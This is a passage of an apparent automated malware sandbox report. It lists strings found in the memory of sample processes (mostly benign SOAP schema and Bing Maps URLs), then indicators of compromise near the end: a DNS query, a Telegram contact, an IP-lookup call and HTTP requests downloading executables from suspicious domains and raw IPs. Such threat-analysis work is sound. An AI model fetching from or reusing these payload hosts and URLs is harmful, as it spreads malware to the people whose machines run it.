                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: CBA.exe, 00000021.00000002.632885407.0000000003540000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp, CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp, CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp, CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp, CBA.exe, 00000021.00000002.632885407.0000000003540000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: svchost.exe, 00000007.00000002.305612043.000001A732013000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 00000005.00000002.538342411.00000175AA83E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000005.00000002.538342411.00000175AA83E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 00000005.00000002.538342411.00000175AA83E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: CBA.exe, 00000013.00000002.408243360.0000000004121000.00000004.00000001.sdmp, CBA.exe, 00000021.00000000.402116569.0000000000402000.00000040.00000001.sdmp, CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000005.00000002.538342411.00000175AA83E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000005.00000002.538342411.00000175AA83E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 00000007.00000002.305659800.000001A73203C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 00000007.00000003.305126285.000001A732068000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305709993.000001A73206A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000007.00000003.305271038.000001A73204E000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.305161130.000001A732048000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 00000007.00000002.305659800.000001A73203C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 00000007.00000002.305669695.000001A732042000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 00000007.00000003.305214782.000001A732040000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.305241653.000001A732041000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305669695.000001A732042000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.305214782.000001A732040000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000007.00000003.305141180.000001A732064000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 00000007.00000002.305659800.000001A73203C000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000007.00000003.283449741.000001A732031000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: 4187.exe, 0000002A.00000002.553213817.0000000000ADD000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.553183370.0000000000AC8000.00000004.00000001.sdmpString found in binary or memory: https://t.me/capibar
                      Source: 4187.exe, 0000002A.00000002.553213817.0000000000ADD000.00000004.00000001.sdmpString found in binary or memory: https://t.me/capibar.
                      Source: svchost.exe, 00000007.00000002.305659800.000001A73203C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 00000007.00000002.305612043.000001A732013000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305659800.000001A73203C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000007.00000003.283449741.000001A732031000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000007.00000003.305233955.000001A732056000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000007.00000003.283449741.000001A732031000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 00000007.00000003.283449741.000001A732031000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305650865.000001A73203A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 00000007.00000003.305271038.000001A73204E000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.305161130.000001A732048000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00402A62 GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,socket,htons,select,recv,htons,htons,htons,GetProcessHeap,HeapAlloc,htons,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,closesocket,GetProcessHeap,HeapFree,
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
                      Source: global trafficHTTP traffic detected: GET /files/2184_1641247228_8717.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: GET /stlr/maps.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.243.44.130
                      Source: global trafficHTTP traffic detected: GET /install1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unic11m.top
                      Source: global trafficHTTP traffic detected: GET /install1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
